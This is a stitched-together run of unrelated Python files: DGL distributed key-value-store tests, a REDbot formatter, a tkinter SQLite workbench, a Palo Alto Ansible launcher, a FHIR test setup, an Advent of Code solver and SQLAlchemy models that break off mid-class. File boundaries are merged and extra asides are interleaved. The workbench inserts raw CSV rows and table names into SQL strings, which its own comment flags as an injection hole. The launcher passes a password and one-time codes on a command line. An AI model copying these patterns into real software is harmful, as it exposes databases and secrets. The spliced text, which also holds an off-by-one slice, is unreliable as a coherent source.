dgl.distributed.graph_partition_book.BasicPartitionBook(part_id=0, num_parts=1, node_map=node_map, edge_map=edge_map, part_graph=g) node_policy = dgl.distributed.PartitionPolicy(policy_str='node:_N', partition_book=gpb) edge_policy = dgl.distributed.PartitionPolicy(policy_str='edge:_E', partition_book=gpb) data_0 = F.tensor([[1.,1.],[1.,1.],[1.,1.],[1.,1.],[1.,1.],[1.,1.]], F.float32) data_0_1 = F.tensor([1.,2.,3.,4.,5.,6.], F.float32) data_0_2 = F.tensor([1,2,3,4,5,6], F.int32) data_0_3 = F.tensor([1,2,3,4,5,6], F.int64) data_1 = F.tensor([[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.]], F.float32) data_2 = F.tensor([[0.,0.],[0.,0.],[0.,0.],[0.,0.],[0.,0.],[0.,0.]], F.float32) def 
init_zero_func(shape, dtype): return F.zeros(shape, dtype, F.cpu()) def udf_push(target, name, id_tensor, data_tensor): target[name][id_tensor] = data_tensor * data_tensor def add_push(target, name, id_tensor, data_tensor): target[name][id_tensor] += data_tensor @unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Do not support windows and TF yet') def test_partition_policy(): assert node_policy.part_id == 0 assert edge_policy.part_id == 0 local_nid = node_policy.to_local(F.tensor([0,1,2,3,4,5])) local_eid = edge_policy.to_local(F.tensor([0,1,2,3,4,5,6])) assert_array_equal(F.asnumpy(local_nid), F.asnumpy(F.tensor([0,1,2,3,4,5], F.int64))) assert_array_equal(F.asnumpy(local_eid), F.asnumpy(F.tensor([0,1,2,3,4,5,6], F.int64))) nid_partid = node_policy.to_partid(F.tensor([0,1,2,3,4,5], F.int64)) eid_partid = edge_policy.to_partid(F.tensor([0,1,2,3,4,5,6], F.int64)) assert_array_equal(F.asnumpy(nid_partid), F.asnumpy(F.tensor([0,0,0,0,0,0], F.int64))) assert_array_equal(F.asnumpy(eid_partid), F.asnumpy(F.tensor([0,0,0,0,0,0,0], F.int64))) assert node_policy.get_part_size() == len(node_map) assert edge_policy.get_part_size() == len(edge_map) def start_server(server_id, num_clients, num_servers): # Init kvserver print("Sleep 5 seconds to test client re-connect.") time.sleep(5) kvserver = dgl.distributed.KVServer(server_id=server_id, ip_config='kv_ip_config.txt', num_servers=num_servers, num_clients=num_clients) kvserver.add_part_policy(node_policy) kvserver.add_part_policy(edge_policy) if kvserver.is_backup_server(): kvserver.init_data('data_0', 'node:_N') kvserver.init_data('data_0_1', 'node:_N') kvserver.init_data('data_0_2', 'node:_N') kvserver.init_data('data_0_3', 'node:_N') else: kvserver.init_data('data_0', 'node:_N', data_0) kvserver.init_data('data_0_1', 'node:_N', data_0_1) kvserver.init_data('data_0_2', 'node:_N', data_0_2) kvserver.init_data('data_0_3', 'node:_N', data_0_3) # start server server_state = dgl.distributed.ServerState(kv_store=kvserver, local_g=None, partition_book=None) dgl.distributed.start_server(server_id=server_id, ip_config='kv_ip_config.txt', num_servers=num_servers, num_clients=num_clients, server_state=server_state) def start_server_mul_role(server_id, num_clients, num_servers): # Init kvserver kvserver = dgl.distributed.KVServer(server_id=server_id, ip_config='kv_ip_mul_config.txt', num_servers=num_servers, num_clients=num_clients) kvserver.add_part_policy(node_policy) if kvserver.is_backup_server(): kvserver.init_data('data_0', 'node:_N') else: kvserver.init_data('data_0', 'node:_N', data_0) # start server server_state = dgl.distributed.ServerState(kv_store=kvserver, local_g=None, partition_book=None) dgl.distributed.start_server(server_id=server_id, ip_config='kv_ip_mul_config.txt', num_servers=num_servers, num_clients=num_clients, server_state=server_state) def start_client(num_clients, num_servers): os.environ['DGL_DIST_MODE'] = 'distributed' # Note: connect to server first ! 
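# Side note, not part of the DGL test: get_local_usable_addr() defined earlier combines a
# UDP "connect" to an unroutable address (to learn the outgoing interface's IP) with
# binding a TCP socket to port 0 so the OS hands out a free ephemeral port. A minimal
# standalone sketch of the free-port half; the helper name is ours.
import socket as _socket

def _free_port():
    """Ask the OS for a currently unused TCP port."""
    s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
    s.bind(('', 0))  # port 0 means "let the OS choose"
    port = s.getsockname()[1]
    s.close()
    return port

# Example: an ip_config entry could be built as '{} {}'.format(ip_addr, _free_port()).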
dgl.distributed.initialize(ip_config='kv_ip_config.txt') # Init kvclient kvclient = dgl.distributed.KVClient(ip_config='kv_ip_config.txt', num_servers=num_servers) kvclient.map_shared_data(partition_book=gpb) assert dgl.distributed.get_num_client() == num_clients kvclient.init_data(name='data_1', shape=F.shape(data_1), dtype=F.dtype(data_1), part_policy=edge_policy, init_func=init_zero_func) kvclient.init_data(name='data_2', shape=F.shape(data_2), dtype=F.dtype(data_2), part_policy=node_policy, init_func=init_zero_func) # Test data_name_list name_list = kvclient.data_name_list() print(name_list) assert 'data_0' in name_list assert 'data_0_1' in name_list assert 'data_0_2' in name_list assert 'data_0_3' in name_list assert 'data_1' in name_list assert 'data_2' in name_list # Test get_meta_data meta = kvclient.get_data_meta('data_0') dtype, shape, policy = meta assert dtype == F.dtype(data_0) assert shape == F.shape(data_0) assert policy.policy_str == 'node:_N' meta = kvclient.get_data_meta('data_0_1') dtype, shape, policy = meta assert dtype == F.dtype(data_0_1) assert shape == F.shape(data_0_1) assert policy.policy_str == 'node:_N' meta = kvclient.get_data_meta('data_0_2') dtype, shape, policy = meta assert dtype == F.dtype(data_0_2) assert shape == F.shape(data_0_2) assert policy.policy_str == 'node:_N' meta = kvclient.get_data_meta('data_0_3') dtype, shape, policy = meta assert dtype == F.dtype(data_0_3) assert shape == F.shape(data_0_3) assert policy.policy_str == 'node:_N' meta = kvclient.get_data_meta('data_1') dtype, shape, policy = meta assert dtype == F.dtype(data_1) assert shape == F.shape(data_1) assert policy.policy_str == 'edge:_E' meta = kvclient.get_data_meta('data_2') dtype, shape, policy = meta assert dtype == F.dtype(data_2) assert shape == F.shape(data_2) assert policy.policy_str == 'node:_N' # Test push and pull id_tensor = F.tensor([0,2,4], F.int64) data_tensor = F.tensor([[6.,6.],[6.,6.],[6.,6.]], F.float32) kvclient.push(name='data_0', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.push(name='data_1', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.push(name='data_2', id_tensor=id_tensor, data_tensor=data_tensor) res = kvclient.pull(name='data_0', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) res = kvclient.pull(name='data_1', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) res = kvclient.pull(name='data_2', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) # Register new push handler kvclient.register_push_handler('data_0', udf_push) kvclient.register_push_handler('data_1', udf_push) kvclient.register_push_handler('data_2', udf_push) # Test push and pull kvclient.push(name='data_0', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.push(name='data_1', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.push(name='data_2', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.barrier() data_tensor = data_tensor * data_tensor res = kvclient.pull(name='data_0', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) res = kvclient.pull(name='data_1', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) res = kvclient.pull(name='data_2', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) # Test delete data kvclient.delete_data('data_0') kvclient.delete_data('data_1') kvclient.delete_data('data_2') # Register new push handler kvclient.init_data(name='data_3', 
shape=F.shape(data_2), dtype=F.dtype(data_2), part_policy=node_policy, init_func=init_zero_func) kvclient.register_push_handler('data_3', add_push) data_tensor = F.tensor([[6.,6.],[6.,6.],[6.,6.]], F.float32) kvclient.barrier() time.sleep(kvclient.client_id + 1) print("add...") kvclient.push(name='data_3', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.barrier() res = kvclient.pull(name='data_3', id_tensor=id_tensor) data_tensor = data_tensor * num_clients assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) def start_client_mul_role(i): os.environ['DGL_DIST_MODE'] = 'distributed' # Initialize creates kvstore ! dgl.distributed.initialize(ip_config='kv_ip_mul_config.txt') if i == 0: # block one trainer time.sleep(5) kvclient = dgl.distributed.kvstore.get_kvstore() kvclient.barrier() print("i: %d role: %s" % (i, kvclient.role)) assert dgl.distributed.role.get_num_trainers() == 2 assert dgl.distributed.role.get_trainer_rank() < 2 print('trainer rank: %d, global rank: %d' % (dgl.distributed.role.get_trainer_rank(), dgl.distributed.role.get_global_rank())) dgl.distributed.exit_client() @unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Do not support windows and TF yet') def test_kv_store(): ip_config = open("kv_ip_config.txt", "w") num_servers = 2 num_clients = 2 ip_addr = get_local_usable_addr() ip_config.write('{}\n'.format(ip_addr)) ip_config.close() ctx = mp.get_context('spawn') pserver_list = [] pclient_list = [] os.environ['DGL_NUM_SERVER'] = str(num_servers) for i in range(num_servers): pserver = ctx.Process(target=start_server, args=(i, num_clients, num_servers)) pserver.start() pserver_list.append(pserver) for i in range(num_clients): pclient = ctx.Process(target=start_client, args=(num_clients, num_servers)) pclient.start() pclient_list.append(pclient) for i in range(num_clients): pclient_list[i].join() for i in range(num_servers): pserver_list[i].join() @unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Do not support windows and TF yet') def test_kv_multi_role(): ip_config = open("kv_ip_mul_config.txt", "w") num_servers = 2 num_trainers = 2 num_samplers = 2 # There are two trainer processes and each trainer process has two sampler processes. num_clients = num_trainers * (1 + num_samplers) ip_addr = get_local_usable_addr() ip_config.write('{}\n'.format(ip_addr)) ip_config.close() ctx = mp.get_context('spawn') pserver_list = [] pclient_list = [] os.environ['DGL_NUM_SAMPLER'] = str(num_samplers) os.environ['DGL_NUM_SERVER'] = str(num_servers) for i in range(num_servers): pserver = ctx.Process(target=start_server_mul_role, args=(i, num_clients, num_servers)) pserver.start() pserver_list.append(pserver) for i in range(num_trainers): pclient = ctx.Process(target=start_client_mul_role, args=(i,)) pclient.start() pclient_list.append(pclient) for i in range(num_trainers): pclient_list[i].join() for i in range(num_servers): pserver_list[i].join() if __name__ == '__main__': test_partition_policy() test_kv_store() test_kv_multi_role() #!/usr/bin/env python """ RST formatter for REDbot. 
""" __author__ = " <>" __copyright__ = """\ Copyright (c) 2008-2010 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ ### FIXME: This code is NOT yet converted to the new Formatter. class RstOutputFormatter(object): msg_categories = [ rs.c.GENERAL, rs.c.CONNECTION, rs.c.CONNEG, rs.c.CACHING, rs.c.VALIDATION, rs.c.RANGE ] def __init__(self, red): self.red = red def print_headers(self): print "HTTP/%s %s %s" % (self.red.res_version, self.red.res_status, self.red.res_phrase) print "Response headers" print "----------------" print "" print "::" print "" print nl.join([ "\t%s:%s" % header for header in self.red.res_hdrs]) #declaring flag definitions print RstOutputFormatter.flag_definition() def print_recommendations(self): print "" nl.join([str(self.print_recommendation(str(category))) for category in self.msg_categories]) def print_recommendation(self, category): messages = [msg for msg in self.red.messages if msg.category == category] if not messages: return nl out = [] if [msg for msg in messages]: out.append("%s:\n" % category) for m in messages: out.append( "- %s" % (self.flagize(m.level, m.summary["en"] % m.vars)) ) smsgs = [msg for msg in getattr(m.subrequest, "messages", []) if msg.level in [rs.l.BAD]] if smsgs: out.append("") for sm in smsgs: out.append( "%s" % (self.flagize(sm.level, sm.summary["en"] % sm.vars)) ) out.append("") out.append("") print nl.join(out) def flagize(self, level, string): # info flag = "|flag-info|" if level == "good": flag = "|flag-good|" if level == "bad": flag = "|flag-bad|" if level == "warning": flag = "|flag-warning|" return flag + " " + string @staticmethod def flag_definition(): flag_dir = "web/icon/" flag_definition_list = { "good":"accept1.png", "bad":"remove-16.png", "warning":"yellowflag1.png", "info":"infomation-16.png" } out = [] out.append("") for flag, icon in flag_definition_list.items(): out.append(".. 
|flag-" + flag + "| image:: " + flag_dir + icon + nl + " :width: 16px") return nl.join(out) # # import sqlite3 as sqldb from Moggs import * from tkinter import filedialog import os import shutil import sys import glob import pprint class Workbench(Tk): def __init__(self): Tk.__init__(self) self.title("SQL Workbench") # toolbar self.toolbar = Buttonbox(self) self.toolbar.add("SQL Pad", command=self.sqlPad) self.toolbar.add("Exit", command=self.exit) self.toolbar.alignbuttons() self.toolbar.pack(side = "top", fill = "x", expand = "no") # main frame mainFrame = Frame(self) mainFrame.pack(side = "top", fill = "both", expand = "yes", padx=4) # left frame lFrame = Frame(mainFrame) lFrame.pack(side = "left", fill = "y", expand = "no", padx=4) # middle frame mFrame = Frame(mainFrame) mFrame.pack(side = "left", fill = "both", expand = "yes", padx=4) # right frame rFrame = Frame(mainFrame) rFrame.pack(side = "left", fill = "y", expand = "no", padx=4) b = Button(rFrame, text = "New Table", command=self.newTable) b.pack() b = Button(rFrame, text = "Edit Table", command=self.editTable) b.pack() b = Button(rFrame, text = "Drop Table", command=self.dropTable) b.pack() b = Button(rFrame, text = "Load Data", command=self.loadData) b.pack() b = Button(rFrame, text = "View Data", command=self.viewData) b.pack() # status bar self.statusBar = LabelEntry(self) self.statusBar.pack(side = "top", fill = "x", expand = "no") # connection manager self.connectionManager = ConnectionManager(lFrame, parent=self) self.connectionManager.pack(side = "top", fill = "both", expand = "yes") # work area self.workArea = ScrolledCanvas(mFrame) self.workArea.pack(side = "top", fill = "both", expand = "yes") self.workArea.oldactive = None ## which object is selected def sqlPad(self): if self.connection: pad = SQLScratchPad(self.connection) def clearWorkArea(self): """remove all items from canvas!""" self.workArea.delete("all") def listTables(self): self.clearWorkArea() sql = "SELECT name FROM sqlite_master WHERE type='table';" tables = self.executeFetchall(sql) self.populateWorkArea(tables) def populateWorkArea(self, tables): Y = 10 X = 10 W = 50 H = 70 for row in tables: tableName = row[0] # create table object tab = Table(self.workArea, tableName, X, Y, W, H) # arrange them all x1, y1, x2, y2 = self.workArea.bbox("all") X = X + W + 15 if X >= 600: X = 10 Y = y2 + 2 self.workArea.tag_bind(tableName, "<1>", TagBinder(self.workArea, tableName)) def dropTable(self): # get table name for selected table if self.workArea.oldactive: tn = self.workArea.oldactive sql = "drop table %s" %tn self.execute(sql) self.commit() self.workArea.oldactive = None self.listTables() def editTable(self): """show the table editor""" # get table name & description for 'active' / selected table if self.workArea.oldactive: tn = self.workArea.oldactive sql = "PRAGMA table_info([%s])" %tn td = self.executeFetchall(sql) te = TableEditor(self, tableName=tn, tableDesc=td) def newTable(self): """show the table editor""" te = TableEditor(self) def exit(self): """Close the main window and withdraw it (clean up)""" self.quit() self.withdraw() def execute(self, sql): cur = self.connection.cursor() cur.execute(sql) def executeFetchall(self, sql): cur = self.connection.cursor() cur.execute(sql) return cur.fetchall() def commit(self): self.connection.commit() def viewData(self): if self.workArea.oldactive: tn = self.workArea.oldactive sql = "PRAGMA table_info([%s])" %tn tdesc = self.executeFetchall(sql) sql = "select * from %s" %(tn) tdata = self.executeFetchall(sql) 
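# Self-contained sketch of the pattern viewData() uses just above: read the column layout
# with "PRAGMA table_info" and then select every row. The table and data here are invented
# for the example; this is illustration, not part of the workbench.
import sqlite3 as _sqlite3

_conn = _sqlite3.connect(':memory:')
_conn.execute("create table pets (id INTEGER PRIMARY KEY, name TEXT)")
_conn.execute("insert into pets values (1, 'rex')")
_cols = [row[1] for row in _conn.execute("PRAGMA table_info([pets])")]  # field 1 is the column name
_rows = _conn.execute("select * from pets").fetchall()
assert _cols == ['id', 'name'] and _rows == [(1, 'rex')]
_conn.close()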
DataEditor(self, tableName=tn, tableDesc = tdesc, tableData = tdata) def loadData(self): ## load the data from a csv file into selected table ## data MUST match table & be in correct column order! if self.workArea.oldactive: tn = self.workArea.oldactive filename = filedialog.askopenfilename() if filename: fin = open(filename) for row in fin: #~ row_data = eval(line) ## SUPER DANGEROUS, SERIOUSLY! ## SQL INJECTION ATTACK WAITING TO HAPPEN sql = "insert into %s values (%s)" %(tn, row) print(sql) self.execute(sql) self.commit() class ConnectionManager(Frame): def __init__(self, cont, parent=None): Frame.__init__(self, cont) self.parent = parent l = Label(self, text = "Choose Connection:") l.pack(fill = "x") self.databaseName = LabelCombobox(self, text = "Database Name") self.databaseName.pack(fill = "x") # testing self.databaseName.set("moggs.dbf") b = Button(self, text = "Connect", command = self.connect) b.pack() # populate databaeName self.populateDatabaseName() def connect(self): self.parent.statusBar.set("") self.backupDatabase() try: self.connection = sqldb.connect(self.databaseName.get()) except Exception as ex: self.parent.statusBar.set("%s" %str(ex)) else: self.parent.connection = self.connection # fudge? self.parent.statusBar.set("Connected to %s" %self.databaseName.get()) self.parent.listTables() def populateDatabaseName(self): filenames = glob.glob("*.dbf") filenames.sort() self.databaseName.setlist(filenames) def backupDatabase(self): dbname = self.databaseName.get() shutil.copyfile(dbname, dbname.replace(".dbf", ".bak")) class DataEditor(Toplevel): def __init__(self, parent=None, tableName="", tableDesc=None, tableData=None): Toplevel.__init__(self) self.title("Data Viewer Table : %s" %tableName) self.parent = parent bb = Buttonbox(self) bb.add("Close", command=self.withdraw) bb.alignbuttons() bb.pack(fill="x") self.dataEditor = ScrolledTreeview(self, show="headings") self.dataEditor.pack(fill="both", expand="yes") cols = [] for row in tableDesc: cols.append(row[1]) self.dataEditor["columns"] = cols for col in cols: self.dataEditor.heading(col, text=col) for row in tableData: #~ print(row) self.dataEditor.insert("", "end", values=row) class TableEditor(Toplevel): def __init__(self, parent=None, tableName="", tableDesc=None): Toplevel.__init__(self) self.title("Edit Table : %s" %tableName) self.parent = parent self.tableColumns = [] # toolbar bb = Buttonbox(self) bb.add("Add", command=self.addRow) bb.add("Save", command=self.saveTable) bb.pack(fill="x") # table name self.tableName = LabelEntry(self, text = "Table Name") self.tableName.set(tableName) self.tableName.pack(fill = "x") # load in the table description create a row per column # populate the rows with the table description # unless new table (tableData=None) in which case # create one empty row if tableDesc: for col in tableDesc: row = TableColumn(self) self.tableColumns.append(row) row.pack() row.colName.set(col[1]) row.dataType.set(col[2]) null = col[3] dflt = col[4] pk = col[5] if pk: row.dataConst.set("PRIMARY KEY") else: if null: row.dataConst.set("NOT NULL") else: row = TableColumn(self) self.tableColumns.append(row) row.pack() def saveTable(self): # drop the table first (very destructive!) sql = "drop table %s" %(self.tableName.get()) #~ print(sql) try: self.parent.execute(sql) self.parent.commit() except: pass # really...? 
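# Safety sketch, not part of the workbench: loadData() above interpolates raw CSV rows
# straight into an INSERT string, which its own comment flags as an injection risk.
# sqlite3 cannot parameterize identifiers (table names), but values can go through "?"
# placeholders. A minimal self-contained example with an invented table:
import sqlite3 as _sqlite3

_conn = _sqlite3.connect(':memory:')
_conn.execute("create table demo (id INTEGER PRIMARY KEY, name TEXT)")
_rows = [(1, "alice"), (2, "bob'); drop table demo; --")]  # hostile-looking value stays inert
_conn.executemany("insert into demo values (?, ?)", _rows)  # placeholders, not string formatting
_conn.commit()
assert _conn.execute("select count(*) from demo").fetchone()[0] == 2
_conn.close()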
# construct the create table sql sql = """create table %s (""" %(self.tableName.get()) for row in self.tableColumns: sql = sql + row.getSQL() sql = sql + "," sql = sql[:-1] + ")" #~ print(sql) self.parent.execute(sql) self.parent.commit() self.parent.listTables() self.withdraw() def addRow(self): row = TableColumn(self) self.tableColumns.append(row) row.pack() def deleteRow(self): pass class TableColumn(Frame): def __init__(self, parent): Frame.__init__(self, parent) # column name self.colName = LabelEntry(self, text = "Column Name") self.colName.pack(side = "left") # column data type self.dataType = LabelCombobox(self, text = "Data Type") self.dataType.setlist(["INTEGER", "REAL", "TEXT", "BLOB"]) self.dataType.pack(side = "left") # column constraints, PRIMARY KEY implies NOT NULL & UNIQUE self.dataConst = LabelCombobox(self, text = "Constraints") self.dataConst.setlist(["", "PRIMARY KEY", "UNIQUE", "NOT NULL", "UNIQUE, NOT NULL"]) self.dataConst.pack(side = "left") def getSQL(self): cn = self.colName.get() dt = self.dataType.get() dc = self.dataConst.get() if dc: return "%s %s %s" %(cn, dt, dc) else: return "%s %s" %(cn, dt) class Table: """object on canvas that represents a database table""" def __init__(self, canvas, tableName, X, Y, W, H): self.canvas = canvas self.name = tableName self.canvas.create_polygon( (X, Y), (X+W-10, Y), # chopped (X+W, Y+H-60), # corner (X+W, Y+H), (X, Y+H), (X, Y), fill = "white", outline = "black", width = 2, tags = tableName, ) # grid lines self.canvas.create_line(X + 5, Y + 20, X + W - 5, Y + 20, width = 2, tags=tableName) self.canvas.create_line(X + 5, Y + 30, X + W - 5, Y + 30, width = 2, tags=tableName) self.canvas.create_line(X + 5, Y + 40, X + W - 5, Y + 40, width = 2, tags=tableName) self.canvas.create_line(X + 5, Y + 50, X + W - 5, Y + 50, width = 2, tags=tableName) # grid lines self.canvas.create_line(X + 5, Y + 20, X + 5, Y + 50, width = 2, tags=tableName) self.canvas.create_line(X + 15, Y + 20, X + 15, Y + 50, width = 2, tags=tableName) self.canvas.create_line(X + 25, Y + 20, X + 25, Y + 50, width = 2, tags=tableName) self.canvas.create_line(X + 35, Y + 20, X + 35, Y + 50, width = 2, tags=tableName) self.canvas.create_line(X + 45, Y + 20, X + 45, Y + 50, width = 2, tags=tableName) # label self.canvas.create_text(X, Y+H, anchor = "nw", text = "%s" %tableName, font = "Courier 6", tags=tableName) class TagBinder: def __init__(self, canvas, tag): self.canvas = canvas self.tag = tag def __call__(self, event): try: self.canvas.itemconfig(self.canvas.oldactive, outline="black") except: pass try: self.canvas.itemconfig(self.tag, outline="red") except: ## this is a real bad hack ## basically one of the items on the canvas does not suport "outline" ## this except catches that and stops changing colour ## happy accident means the outside shape is changed but nothing else! 
pass self.canvas.oldactive = self.tag class SQLScratchPad(Toplevel): def __init__(self, connection): Toplevel.__init__(self) self.title("SQL Scratch Pad") self.connection = connection l = Label(self, text = "SQL Input") l.pack(fill="x") self.sqlInput = ScrolledText(self, height=3) self.sqlInput.pack(fill="both", expand="yes") bb = Buttonbox(self) bb.add("Execute", command=self.execute) bb.add("Execute & Fetch One", command=self.executeFetchone) bb.add("Execute & Fetch All", command=self.executeFetchall) bb.add("Close", command=self.withdraw) bb.alignbuttons() bb.pack(fill="x") l = Label(self, text = "Results...") l.pack(fill="x") self.sqlOutput = ScrolledText(self) self.sqlOutput.pack(fill="both", expand="yes") def log(self, text): self.sqlOutput.insert("end", "-------------------------------------\n") self.sqlOutput.insert("end", text) self.sqlOutput.insert("end", "\n-------------------------------------\n") self.sqlOutput.see("end") def execute(self): sql = self.sqlInput.gettext() cur = self.connection.cursor() cur.execute(sql) self.log("executed") def executeFetchone(self): sql = self.sqlInput.gettext() cur = self.connection.cursor() cur.execute(sql) self.log(pprint.pformat(cur.fetchone())) def executeFetchall(self): sql = self.sqlInput.gettext() cur = self.connection.cursor() cur.execute(sql) self.log(pprint.pformat(cur.fetchall())) wb = Workbench() wb.mainloop() nembery/reference_architecture_automation1-10 import os import socket from docker import DockerClient from jinja2 import Environment, FileSystemLoader env = Environment(loader=FileSystemLoader('.')) variables = { 'p_ip': os.environ.get('Panorama_IP'), "p_serial": os.environ.get('Primary_Serial'), "p_peer": os.environ.get('Secondary_Private_IP'), "s_ip": os.environ.get('Secondary_IP'), "s_serial": os.environ.get('Secondary_Serial'), "s_peer": os.environ.get('Primary_Private_IP') } ansible_variables = "\"password="+os.environ.get('PASSWORD')+" primary_otp="+os.environ.get('OTP')+" secondary_otp="+os.environ.get('Secondary_OTP')+"\"" if os.environ.get('enable_ha') == "true": inventory_template = env.get_template('ha_inventory.txt') secondary_inventory = inventory_template.render(variables) with open("inventory.yml", "w") as fh: fh.write(secondary_inventory) else: inventory_template = env.get_template('inventory.txt') primary_inventory = inventory_template.render(variables) with open("inventory.yml", "w") as fh: fh.write(primary_inventory) client = DockerClient() container = client.containers.run('paloaltonetworks/pan-ansible', "ansible-playbook platformsettings.yml -e "+ansible_variables+" -i inventory.yml", auto_remove=True, volumes_from=socket.gethostname(), working_dir=os.getcwd(), user=os.getuid(), detach=True) # Monitor the log so that the user can see the console output during the run versus waiting until it is complete. The container stops and is removed once the run is complete and this loop will exit at that time. 
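# Illustrative aside (variable names mirror the ones above, but the template text is
# invented): the inventory files above are produced by rendering Jinja2 templates with
# values pulled from environment variables. The same idea with an inline template string:
from jinja2 import Template as _Template

_line = _Template("panorama ansible_host={{ p_ip }} serial={{ p_serial }}").render(
    p_ip='10.0.0.10', p_serial='0001')
assert _line == "panorama ansible_host=10.0.0.10 serial=0001"
# The container-log streaming loop described by the comment above continues below.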
for line in container.logs(stream=True): print(line.decode('utf-8').strip()) # Run the appropriate Ansible playbook based on if the user selected HA or not if os.environ.get('enable_ha') == "true": container = client.containers.run('paloaltonetworks/pan-ansible', "ansible-playbook ha.yml -e "+ansible_variables+" -i inventory.yml", auto_remove=True, volumes_from=socket.gethostname(), working_dir=os.getcwd(), user=os.getuid(), detach=True) for line in container.logs(stream=True): print(line.decode('utf-8').strip()) else: container = client.containers.run('paloaltonetworks/pan-ansible', "ansible-playbook otp.yml -e "+ansible_variables+" -i inventory.yml", auto_remove=True, volumes_from=socket.gethostname(), working_dir=os.getcwd(), user=os.getuid(), detach=True) for line in container.logs(stream=True): print(line.decode('utf-8').strip()) tests/__init__.py0 import os from fhir_loader import fhir_loader cwd = os.path.abspath(os.path.dirname(__file__)) datadir = os.path.join(cwd, 'data') # ***** server must be pointed at a working FHIR server for test_loader tests to work # server = "http://localhost:88/baseR4/" server = "http://192.168.3.11:88/baseR4" # server=None # Preload the groups so the rest of the tests work fhir_loader([server, os.path.join(datadir, 'preload'), '-v', '-r'])import itertools def ReadDocuments(filename): with open(filename,"r") as file: data = [int(line.strip("\n")) for line in file.readlines()] return data def FindInvalid(data,preamble_length): i = preamble_length while i < len(data): a = [x for x in range(i-preamble_length,i)] is_sum = False for j, k in itertools.combinations_with_replacement(a,2): if j != k and (data[j]+data[k] == data[i]): #print(f"i={i}={data[i]} j={j}={data[j]} k={k}={data[k]} sum j+k ={data[j]+data[k]}" ) if data[j]+data[k] == data[i]: is_sum = True if is_sum: break if is_sum: break if not is_sum: return i, data[i] else: i += 1 def FindContigValsSum(data, invalid): n = len(data) for i in range(n): summation = data[i] for j in range(i+1,n): summation += data[j] if summation == invalid: return data[i:j] elif summation > invalid: break if __name__=="__main__": # example.txt has a length 5 preamble and considers the 5 previous numbers # input.txt has a length 25 preamble and considers the 25 previous numbers data = ReadDocuments("input.txt") line, value = FindInvalid(data,25) print(f"First invalid value = {value} at line {line}") contigvals = FindContigValsSum(data,value) print(f"Encryption Weakness = {max(contigvals)+min(contigvals)}") """ This contains classes for loading tweet data In the process of being converted to use sqlalchemy """ from sqlalchemy import Table, Column, ForeignKey, Integer, String, JSON, DateTime from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import inspect import datetime from sqlalchemy.sql import func # import DatabaseAccessObjects.EngineMakers # from DatabaseAccessObjects import DataConnections import json # connecting to db # Base class that maintains the catalog of tables and classes in db Base = declarative_base() class Users(Base): __tablename__ = 'users' # indexer = Column(Integer, unique=True) userID = Column(Integer, primary_key=True, autoincrement=False) screen_name = Column(String(225)) id_str = Column(String(225)) name = Column(String(225)) description = Column(String(250)) lang = Column(String(100)) utc_offset = Column(String(100)) verified = Column(String(100)) followers_count = Column(Integer) friends_count = Column(Integer) url = Column(String(100)) time_zone = Column(String(100)) 
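# Aside on FindContigValsSum() above (the Advent of Code helper, unrelated to these ORM
# models): when the running sum hits the target at index j the function returns data[i:j],
# which leaves out data[j] even though data[j] was part of the matching sum; the full run
# would be data[i:j+1]. A compact standalone version of the same search as a sliding
# window over non-negative values (illustrative, not the puzzle code):
def _contiguous_run_summing_to(values, target):
    lo, acc = 0, 0
    for hi, v in enumerate(values):
        acc += v
        while acc > target and lo < hi:
            acc -= values[lo]
            lo += 1
        if acc == target and hi > lo:
            return values[lo:hi + 1]
    return None

# Day-9 style example: 127 is the sum of the contiguous run 15 + 25 + 47 + 40.
assert _contiguous_run_summing_to([35, 20, 15, 25, 47, 40, 62], 127) == [15, 25, 47, 40]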
